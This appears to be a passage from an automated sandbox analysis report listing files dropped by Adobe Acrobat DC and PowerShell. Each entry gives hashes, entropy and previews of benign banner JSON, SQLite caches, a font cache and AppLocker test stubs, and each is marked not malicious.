                                                                                      SHA-256:5CC301C39183ED33F05BC8D14EE1FDE0312142C138B4135C5FD7DA5D5FDC09E5
                                                                                      SHA-512:CED1413B0986B9C30091DD541EE1C1318BA8A316EA962A29385F6D33BBCEA55CB1282E94452BE9A9AC439A32A3DEABB180C7BB24026EB82E4A48CFFCAD67C11E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.257781685598484
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfQ1rPeUkwRe9:YvXKXsvyB3pUTbdFVGY16Ukee9
                                                                                      MD5:1F5B952F6468444A3BB3659A1C652FC3
                                                                                      SHA1:A7159CDC2E6C0B646F07391939DB4DCF2313D8B1
                                                                                      SHA-256:541AA3EF07B121359056425B164D0C09BE94829083B8E9E95FFB8ADBD7C829B3
                                                                                      SHA-512:795667C787CFF70348CBAA92A551C5F770FDC8A96A70C30D508DC6E34367B3C6E9C5A2603DD3E2CCB3226B8F4686EE36EE34E17C82FF92A621AB4497363D9CCA
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.266752648577599
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfFldPeUkwRe9:YvXKXsvyB3pUTbdFVGz8Ukee9
                                                                                      MD5:B3594BB84B670BC4FD53E742970A3CC5
                                                                                      SHA1:875C7C2079958F1380AF61C7373FBCD936E8138C
                                                                                      SHA-256:A891BEA67289D3D6AB06A08CD89D17F582299940E67D2D5F10F5C3E509C75E67
                                                                                      SHA-512:7BEAA27713E216914D6E15E595CB66C79CA8C43A940DD817BC2905E4276CDFEAA898BD2B2631D31466B3E1705D8245F2F2B6F760E40049F16024B1ED1E472954
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.283388831034492
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfzdPeUkwRe9:YvXKXsvyB3pUTbdFVGb8Ukee9
                                                                                      MD5:196EEB3B7A5AD92F1427363A9EBC8719
                                                                                      SHA1:0B68EA754A1D4B4E43941484E6DDDE0B2B2D7951
                                                                                      SHA-256:948C3382E1C4B3662BC1706856AAF5A36628ED3FCC4DB8E950EBB74E61E3873D
                                                                                      SHA-512:4E169742ABC4B4B1D4404550701B3638F482D02C12142DC48CB151E7CE6BD2AD40CE3BCA799741A3CA0CDA4754AB07889BF95566F3BAB2E597FA17D23098091F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.262679669316352
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfYdPeUkwRe9:YvXKXsvyB3pUTbdFVGg8Ukee9
                                                                                      MD5:20B447B86D373AEF9027A25D34C156A6
                                                                                      SHA1:D20BE7C391FA1CAC3E65F1D8BC4742D49F75D4D8
                                                                                      SHA-256:147857C896CDB89F765340B015B6C23DB4CFC6F5D22C1FDC8595D90574D2A362
                                                                                      SHA-512:6E0C57C719AB5E97026785D954C456B3D77DC656AA06429D22AD79CD03D0612FE3846DD7CE51C90A69B7A5A61F6D83D8A69475FAE2A5B72BD3002463B076871B
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):284
                                                                                      Entropy (8bit):5.24837198499145
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJf+dPeUkwRe9:YvXKXsvyB3pUTbdFVG28Ukee9
                                                                                      MD5:F7D34EA785A869FE581E76289E362F21
                                                                                      SHA1:6E4697DF5B9FC0C41794C2673283FE2D93F8EE71
                                                                                      SHA-256:F5B19E02D32905B37746EAAB5D1D26D4AE42901C2B9DBF1B8DB953C07D9DEE6F
                                                                                      SHA-512:ECD59B907532A56C67AAD3D9942454FDC3ECC9D1EBF5E10A8DE40B090C5F3A24A177DED73E9E9A1930D421345A979C40B35D400CD0563CD807B8B18DF59CAAAB
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):291
                                                                                      Entropy (8bit):5.246483264108316
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfbPtdPeUkwRe9:YvXKXsvyB3pUTbdFVGDV8Ukee9
                                                                                      MD5:E9BE0A54297965B96D7A990443417838
                                                                                      SHA1:8B8D4D7760648293D7FE86A35D994CAD26335B60
                                                                                      SHA-256:4AD81B8FDF33694799D2C9BD3E935C9CBFA24445A3A82E06F4D2C92BBA6BFA92
                                                                                      SHA-512:AE7BAE5FD7E0826DCF849C6A0BE5932D5FD5E82AA58B27B72388B79C87D9E3CBFBA6D321129F6D5CE39F8BC169C211B7FF7D546A1F6793745C86F4072B915B80
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.248698265222601
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJf21rPeUkwRe9:YvXKXsvyB3pUTbdFVG+16Ukee9
                                                                                      MD5:490AB2D973C080FFC6A7CBBC6BCAE48A
                                                                                      SHA1:AE99D79E428E17222DFC7E930402192F99767315
                                                                                      SHA-256:9412686392DE709E8329F48ADAF4A1FAD8B9F8A2DEE6340EDCDB688921562115
                                                                                      SHA-512:1119F77286C071223D1ED292C8F737C3D4E7091CC8D58867B9154D16BB794129584F15DD6130AD9B73438FDE72F72197A8B1D6253018C9137D375FE9834E248F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1090
                                                                                      Entropy (8bit):5.661948484551362
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XvpUXnmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSz:YvMwnoBgkDMUJUAh8cvMz
                                                                                      MD5:80156874CCAB49AA0A3A4EBB29651217
                                                                                      SHA1:9EFA28F57C8CDA91E9ED0701C0046556EE85A481
                                                                                      SHA-256:48337602AD34F188FF6873AAC2E3EBF4432CDC139CB0DD63D3A664556A7DD347
                                                                                      SHA-512:6749067BDEFCF442ABCF8815AC3D2E1AED86B023C8B30C22BB0BF2E0E4260E2A422F0EE3D47F01980748A46D76FF1D89A2AC638B3BDDC1BD828D397BAF262E5E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):5.223285754472847
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfshHHrPeUkwRe9:YvXKXsvyB3pUTbdFVGUUUkee9
                                                                                      MD5:0B3DE5C30545E7F564BA9670F5298C8E
                                                                                      SHA1:DE750BBA64561AD20BB231EFF81CBE2F43C2BB4E
                                                                                      SHA-256:2762A9E34E3EE6C994C3A48F1BA42E0FE2C7127CC96519B07F56FF32970ED39B
                                                                                      SHA-512:FF120987370C3CE3C9953C89A9815E4CD59AC654A129E6F805B83D2998C11C6035E166F85FB277A04FD2A64FBEC410069341B2703F0DFF6A8D89C5DF1929BC76
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):5.232538743281086
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJTqgFCrPeUkwRe9:YvXKXsvyB3pUTbdFVGTq16Ukee9
                                                                                      MD5:477F6C0833C467D3CB77DB271DE0E1FD
                                                                                      SHA1:F72A6B3A02B847E96A2AE29028A18273F59A0FAB
                                                                                      SHA-256:7808A0F6D178C87A91D4C59CA36AD19F1C59400BA13CEA7178681F027AAA97B6
                                                                                      SHA-512:D917929093E13E1A5F440482C66B1DE0CDD794F2EAB268F1F26A672B8B722CFB49289AF6D60BD5AE4F3662236D9B8EE1A522CFCB95196A35127B6237EA1088F4
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:e:e
                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                      Malicious:false
                                                                                      Preview:....

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):2814
                                                                                      Entropy (8bit):5.135587288361188
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Y5ok+aJ4mayETPmq9aUezjV9U1WnSWjPTcj0S2+CG2GVX2LSICGMlZk70zV5+IK6:Y5oTusePQ1GlPTu7dnJi0ZJRMIu9knz
                                                                                      MD5:FB99BC7A9E4BC0CA221494B12C5354F1
                                                                                      SHA1:957DA4D931082C8E02F3A9077D59478FD02AC7A3
                                                                                      SHA-256:039A879E44EDFF4A0CC4000C03F08CC3835008C51C6D37859794010774B6B9C6
                                                                                      SHA-512:397EEB8DC185C8E7D75AB7E592424B3C1F12C7E2FCDC7E583DC2912A5562CF8D350169C18BA180015E5391E05FA491610F0AFD3F063E66533718C47A6114FD9D
                                                                                      Malicious:false
                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"69ff87e55d9699bd91e9690a7037ca7c","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734608725000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b126a9614c1cc94fd401d9f9c8b49280","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734608725000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"0c9dc875f62a4944a043f1a44fa0cbf1","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734608725000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"40b04372bff7ce65cd4e4418b8a5c1c7","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734608725000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"7d6226b7ae6f016401819b500d3753e2","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734608725000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"b6deb49bfb2be9e7b7476b0c6f94088c","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                      Category:dropped
                                                                                      Size (bytes):12288
                                                                                      Entropy (8bit):1.3194898193238873
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6YdS+EXSqXl/:TGufl2GL7msUKB0M0+Tb608YdLrlS
                                                                                      MD5:0A7AF083077F36CBAA92364ED154FDAF
                                                                                      SHA1:E9D17D22C4BE19E71BA407EACC439F89B3B98B24
                                                                                      SHA-256:FC47886426F50B044AABD9066BA71602A431071E8D204500F2617FCDCABDFE53
                                                                                      SHA-512:B7FE45127955F234D705683B34C378A2C9D56F7B5818E9DF11ADF20D06721E571A13AC4B18BC2C4461AABCBB3981C75A5AA5531E10D94A4DD26CA81148FBA097
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):1.782420791039616
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7McmKB0M0+Tb608YdyrGKEnqFl2GL7msz:7fJFb608YUcKVmsz
                                                                                      MD5:3D9CF45274FEE3A102362436E4741E87
                                                                                      SHA1:E633BFA3D6A2E071012F97094E735C5749AD1CB5
                                                                                      SHA-256:B6504927EB40845E1EFABCA9242A7EF27D60CF68345A26B065159C5AB80C87C3
                                                                                      SHA-512:9DCBC97CA6B105043D62FEC2991D518BBBC0B7DB026F17117A104DA3FD6FE6F7887F606DEE8779CAA7D1373186C6CE95B6DE2D37DA43890C0BC4B6D4F3595E53
                                                                                      Malicious:false
                                                                                      Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):66726
                                                                                      Entropy (8bit):5.392739213842091
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEg55pqtTyuN+1BT8EuZeOsqlwHmz0Y4Yyu:6a6TZ44ADE55cP8jTJuZe8wK
                                                                                      MD5:56193CE1D58B67A398470CF973F66587
                                                                                      SHA1:4FA52274AA682B6F475D0AFCE1992C7DDE072C81
                                                                                      SHA-256:47B20409E81DA3A5CA87388459534831DD1D7410A7208BF50DFC31305403FFAA
                                                                                      SHA-512:85B0A6A6E848E4D9D435EF6A04F0EE36B461F690A5EC896BFDC353964D27A15617EB2896390EE30FB74E3916ABE5019830BFBBE768635E57746DBBC05C89987E
                                                                                      Malicious:false
                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1940658735648508
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlllulzych:NllUec
                                                                                      MD5:599AEF4CF899A068F1C52942AC2767D6
                                                                                      SHA1:0551ACAAAAD90D63B311551C3436A627D88F1A23
                                                                                      SHA-256:B1DB9D56B886B8A53FBCED14386BB9A9258DD0008EADA73181C655A9D4A33E30
                                                                                      SHA-512:BAFAE235810B95669C88DB19FF84A9549CB8FD66663E1DFA48B0BE15DD3F8DC177ECF970E41E0AFE82E2773EF0F2826629F47E444891A95ADF1A2400494F9B1B
                                                                                      Malicious:false
                                                                                      Preview:@...e...................................y............@..........

                                                                                      C:\Users\user\AppData\Local\Temp\MSI947f5.LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):246
                                                                                      Entropy (8bit):3.53559722477471
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAmtrCH:Qw946cPbiOxDlbYnuRKyU
                                                                                      MD5:CB14CDD19050DB86A42AA8DA5CE99909
                                                                                      SHA1:AA56DF77D3759284BD8F55757E02C85F9BBF02B7
                                                                                      SHA-256:9C87CF058D6706F9D6297B118AB28E26E37EB53FB68BCF8F56A75C9DC7DB0577
                                                                                      SHA-512:465B9D1857E82CA8352E5E34B3CB3F88C3E425E1E03CB4823E5A3E2A3EE5C6D75A15966E9655FB8D0999601327582C8D327B15C62EEF6BDAB5845039F3B4394A
                                                                                      Malicious:false
                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.4.5.:.2.3. .=.=.=.....

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_120lh1jc.dfj.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3a3o5ibo.cty.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dluyv2wx.teb.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prfuvhwq.tf1.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
